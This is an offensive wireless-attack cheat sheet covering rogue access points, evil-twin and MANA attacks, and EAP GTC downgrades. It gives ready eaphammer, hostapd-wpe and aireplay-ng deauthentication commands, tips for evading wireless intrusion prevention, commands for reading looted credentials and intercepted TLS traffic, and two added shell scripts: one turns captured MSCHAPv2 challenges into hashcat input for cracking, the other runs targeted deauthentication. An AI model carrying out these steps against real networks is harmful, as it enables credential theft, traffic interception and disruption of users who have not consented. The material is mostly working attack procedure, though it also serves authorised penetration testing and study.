Rogue AP and MANA

Opsec Considerations:
- Enable 802.11w (PMF) on the rogue AP so that clients which negotiate it discard the unprotected deauthentication frames a WIPS sends.
- Spoof the BSSID of an AP that is not in wireless range to avoid BSS conflicts with the legitimate one.
- Beacon frames are broadcast, so MAC-based management frame ACLs cannot restrict beacon-based attacks to specific devices.

EAPHammer selects the hardware mode with --hw-mode (default is 802.11a or 802.11b depending on the specified channel):
- 802.11b: older specification, 2.4GHz only
- 802.11a: used for creating 5GHz access points
- 802.11g: used for creating 2.4GHz access points
- 802.11n: usable on both 2.4GHz and 5GHz; 20MHz channels by default, add --channel-width 40 for 40MHz channels

Rogue AP and Evil Twin attack

Rogue AP - EAP

hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

GTC downgrade

Opsec Considerations:

During the negotiation, two indicators are visible on the wireless endpoint: an EAP method the legitimate AP does not support is offered, and the EAP methods are proposed in a different order.

Effective against Android phones.

Effective against iOS, but the device prompts the user to accept the server certificate.

Windows supplicants do not fall back to GTC, so against Windows only an MSCHAPv2 challenge/response can be captured, to be cracked offline.

Does not work if:
- the supplicant uses certificate-based authentication (EAP-TLS), since there is no inner authentication to downgrade
- the supplicant validates the server certificate
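The Windows case above leaves you with a challenge/response rather than a password. As an added example (not part of the original notes and not hostapd-wpe's own tooling), the POSIX shell helper below turns such logged MSCHAPv2 pairs into hashcat mode 5500 lines (user::::response:challenge) for offline cracking. The sample log text is constructed here in the shape of hostapd-wpe's log entries; the assumed layout is a record header starting with "mschapv2:" followed by "username:", "challenge:" and "response:" fields holding colon-separated hex bytes (8-byte challenge, 24-byte response). Real entries come from the file set by wpe_logfile in hostapd-wpe.conf.

```shell
#!/bin/sh
# Added example, not from the original notes: convert the MSCHAPv2
# challenge/response pairs that hostapd-wpe logs into hashcat mode 5500 lines
# (format user::::response:challenge) for offline cracking.
# Assumptions: log records start with "mschapv2:" and carry "username:",
# "challenge:" and "response:" fields with colon-separated hex bytes
# (8-byte challenge, 24-byte response). SAMPLE_LOG is constructed in that
# shape; real entries come from the file set by wpe_logfile in
# hostapd-wpe.conf. The second record is deliberately truncated.

SAMPLE_LOG='mschapv2: Mon Jan  1 10:00:00 2024
	 username:	jdoe
	 challenge:	1a:2b:3c:4d:5e:6f:70:81
	 response:	00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:01:23:45:67:89:ab:cd:ef
mschapv2: Mon Jan  1 10:00:05 2024
	 username:	truncated
	 challenge:	1a:2b:3c:4d:5e:6f:70:81
	 response:	00:11:22:33'

# Read log text from $1 and print one hashcat 5500 line per complete record.
# Records whose challenge/response are not 16/48 hex characters after the
# colons are stripped are reported on stderr and skipped, instead of
# producing a line hashcat would reject.
wpe_to_hashcat() {
    printf '%s\n' "$1" | awk '
        /^mschapv2:/  { user = ""; chal = ""; resp = "" }
        /username:/   { user = $NF }
        /challenge:/  { chal = $NF; gsub(":", "", chal) }
        /response:/   {
            resp = $NF; gsub(":", "", resp)
            if (user != "" && length(chal) == 16 && length(resp) == 48)
                print user "::::" resp ":" chal
            else
                print "skipping malformed record for user " user > "/dev/stderr"
        }'
}

# Number of usable hashes, as a sanity check before starting a cracking job.
wpe_hash_count() {
    wpe_to_hashcat "$1" 2>/dev/null | wc -l | tr -d ' '
}

# Usage: ./wpe2hashcat.sh hostapd-wpe.log > mschapv2.5500
if [ "$#" -ge 1 ]; then
    wpe_to_hashcat "$(cat "$1")"
else
    wpe_to_hashcat "$SAMPLE_LOG"
fi
```

The resulting file is cracked with hashcat -m 5500 against a wordlist; the length check matters because a truncated log entry silently produces an unusable hash.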

Balanced Approach (default)

Phase 1 (outer authentication):

PEAP,TTLS,TLS,FAST

Phase 2 (inner authentication):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

./eaphammer -i <wlan0> --auth wpa-eap -e <SSID> --creds -c <same_channel> -b <similar_BSSID>

Explicit GTC downgrade

./eaphammer -i <wlan0> --negotiate gtc-downgrade --auth wpa-eap -e <ESSID> --creds [--hw-mode <g/a>] [-c <channel>] [-b <BSSID>]

Open and PSK

./eaphammer -i <wlan0> --bssid <BSSID> -e <ESSID> -c <channel> --auth open [--captive-portal | --hostile-portal]
./eaphammer -i <wlan0> -e <ESSID> -c <channel> --auth wpa-psk --wpa-passphrase <psk>

Deauthenticate the legitimate AP's clients from a second adapter in monitor mode (-0 0 keeps sending deauthentication frames until stopped):

aireplay-ng -0 0 -a <ap_mac> <wlan1mon>

MANA and known beacon attacks

WIPS is present

Create a whitelist of target client MAC addresses (one per line):

echo <client_MAC> > bssid_targets.txt

Create rogue AP

./eaphammer -i <wlan0> -e <ESSID> --pmf enable --cloaking full --mana --auth <wpa-eap | wpa-psk> --creds --mac-whitelist bssid_targets.txt

As the rogue AP is waiting for probe requests, deauthenticate the whitelisted supplicants from the real AP using a second adapter in monitor mode (the interface hosting the rogue AP cannot inject):

while read -r client; do aireplay-ng -0 5 -a <ap_mac> -c "$client" <wlan1mon>; done < bssid_targets.txt
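As an added example (not part of the original notes, nor of EAPHammer or aircrack-ng), the script below performs the deauthentication step of the whitelist procedure above with the checks the one-liner lacks: it validates and normalises each target MAC, drops duplicates, refuses the broadcast address, and insists on a separate monitor-mode interface for aireplay-ng. The names wlan1mon and DRY_RUN are assumptions introduced here; the targets file format (one client MAC per line) is the one --mac-whitelist expects.

```shell
#!/bin/sh
# Added example, not from the original notes: the deauthentication step of
# the MANA + whitelist procedure, with input validation.
# Assumptions: the targets file holds one client MAC per line (the same file
# passed to eaphammer --mac-whitelist; comments and blank lines are tolerated
# here but should not be in the file given to eaphammer); the rogue AP
# occupies <wlan0>, and aireplay-ng injects from a SECOND adapter in monitor
# mode (wlan1mon here, as created by airmon-ng), because an interface driven
# by hostapd cannot inject. DRY_RUN=1 prints the commands instead of running them.

# Normalise a MAC to lowercase colon form; fail on anything else, including
# the broadcast address, which would deauth every client of the AP.
norm_mac() {
    m=$(printf '%s' "$1" | tr -d '[:space:]' | tr 'A-F' 'a-f')
    case "$m" in
        ff:ff:ff:ff:ff:ff) return 1 ;;
        [0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f])
            printf '%s\n' "$m" ;;
        *) return 1 ;;
    esac
}

# Print the usable, de-duplicated targets from a file; report bad lines on stderr.
clean_targets() {
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$1" |
    while IFS= read -r line; do
        norm_mac "$line" || printf 'skipping invalid MAC: %s\n' "$line" >&2
    done | sort -u
}

# deauth_targets <targets.txt> <ap_mac> <monitor_iface> [frames_per_client]
# Returns non-zero if the AP MAC is invalid or no usable target remains.
deauth_targets() {
    targets=$1; mon=$3; count=${4:-5}
    ap=$(norm_mac "$2") || { printf 'bad AP MAC: %s\n' "$2" >&2; return 2; }
    n=0
    for client in $(clean_targets "$targets"); do
        n=$((n + 1))
        if [ "${DRY_RUN:-0}" = 1 ]; then
            printf 'aireplay-ng -0 %s -a %s -c %s %s\n' "$count" "$ap" "$client" "$mon"
        else
            aireplay-ng -0 "$count" -a "$ap" -c "$client" "$mon"
        fi
    done
    [ "$n" -gt 0 ]
}

# Usage: DRY_RUN=1 ./deauth_targets.sh bssid_targets.txt <ap_mac> wlan1mon
if [ "$#" -ge 3 ]; then
    deauth_targets "$@"
fi
```

Run it once with DRY_RUN=1 to review the exact frames that will be sent; a stray broadcast or mistyped entry in the whitelist otherwise turns a targeted attack into a noisy one that a WIPS will flag.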
MANA loud mode

./eaphammer -i <wlan0> -e <ESSID> --cloaking full --mana --loud

Known beacon

./eaphammer -i <wlan0> --mana -e <known_ESSID> --known-beacons --captive-portal --known-ssids-file <list_of_known_ESSID.txt> [--loud]

Old technique

Start Mana - Custom script

/usr/share/mana-toolkit/run-mana/custom.sh

Loot

cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keyword>
cp -r /var/lib/mana-toolkit/sslsplit/ /tmp
bulk_extractor -R /tmp/sslsplit/ -o /tmp/loot
binwalk -e /tmp/sslsplit/*